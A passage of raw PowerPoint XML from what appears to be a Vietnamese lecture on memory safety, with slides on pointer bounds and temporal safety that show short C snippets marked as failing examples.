                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>//Fail: &amp;str </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>≤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> p = &amp;str + 10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>≤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (&amp;str + 10) - 1</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" b="1">
              <a:latin typeface="Consolas" panose="020B06090202040302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B6EE521-3037-448C-BDB8-FB9FE7262DF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5943600" y="4400490"/>
            <a:ext cx="609600" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="1600" b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2545771-368E-4C24-A6EA-1164B75180EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5638800" y="3124200"/>
            <a:ext cx="609600" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="1600" b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="9" name="Table 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{735139B9-85E0-4591-B05D-0797DFEECF56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1639141719"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3200400" y="1143000"/>
          <a:ext cx="4648200" cy="365760"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="581025">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2782097203"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="581025">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="646219912"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="581025">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4201891519"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="581025">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3053556636"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="581025">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3526461388"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="581025">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2936534937"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="581025">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="30084215"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="581025">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3617472491"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="277314">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US"/>
                        <a:t>00</a:t>
                      </a:r>
                      <a:endParaRPr lang="vi-VN"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US"/>
                        <a:t>00</a:t>
                      </a:r>
                      <a:endParaRPr lang="vi-VN"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US"/>
                        <a:t>00</a:t>
                      </a:r>
                      <a:endParaRPr lang="vi-VN"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US"/>
                        <a:t>00</a:t>
                      </a:r>
                      <a:endParaRPr lang="vi-VN"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US"/>
                        <a:t>00</a:t>
                      </a:r>
                      <a:endParaRPr lang="vi-VN"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="tx2">
                        <a:lumMod val="60000"/>
                        <a:lumOff val="40000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-GB"/>
                        <a:t>00</a:t>
                      </a:r>
                      <a:endParaRPr lang="vi-VN"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="tx2">
                        <a:lumMod val="60000"/>
                        <a:lumOff val="40000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB"/>
                        <a:t>00</a:t>
                      </a:r>
                      <a:endParaRPr lang="vi-VN"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="tx2">
                        <a:lumMod val="60000"/>
                        <a:lumOff val="40000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB"/>
                        <a:t>0a</a:t>
                      </a:r>
                      <a:endParaRPr lang="vi-VN"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="tx2">
                        <a:lumMod val="60000"/>
                        <a:lumOff val="40000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4129535022"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41263D34-8D54-41CD-85E3-5610F88E24DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1094512"/>
            <a:ext cx="2743200" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1"/>
              <a:t>x(chiếm 4 byte):</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2400" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{613F580A-F78E-4B6E-9226-BF21A43D8AA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2819400" y="1508760"/>
            <a:ext cx="533400" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1"/>
              <a:t>y</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2400" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Arrow Connector 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E257AF30-3134-431C-A794-933014FE3EE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3048000" y="1492718"/>
            <a:ext cx="221602" cy="161596"/>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2951714-BB5A-417D-AD46-9625C0144846}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5159051" y="1639850"/>
            <a:ext cx="533400" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1"/>
              <a:t>z</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2400" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Arrow Connector 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D02C4219-6CBC-4692-A2DB-92025C681365}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5425751" y="1502983"/>
            <a:ext cx="266700" cy="219474"/>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7B696272-C4C5-4DBD-8FF5-0338160C53E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6324600" y="1992868"/>
            <a:ext cx="2438400" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>b ≤ p ≤ e – s</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2000">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1015033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652F-FB7A-4A5E-A984-9298D6571DDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>An toàn truy cập bộ nhớ</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{572ED08A-0586-4276-9B2E-B258535D81FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>An toàn thời gian(Temporal safety): thao tác chỉ truy cập vào vùng nhớ đã được khởi tạo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Đã cấp phát bộ nhớ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Đã được khởi tạo giá trị</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Ví dụ: Vi phạm an toàn về thời gian</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{164799F0-AFF1-4D62-B29E-D7E1005C484F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>102</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90908409-7D0B-435F-A624-BDCBFC697657}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="737118" y="3314641"/>
            <a:ext cx="7924800" cy="2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> n;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>printf(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"%d"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, n);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// Fail</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>m = n + 1;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(n)…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> *p;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>*p = 0;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// Fail</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
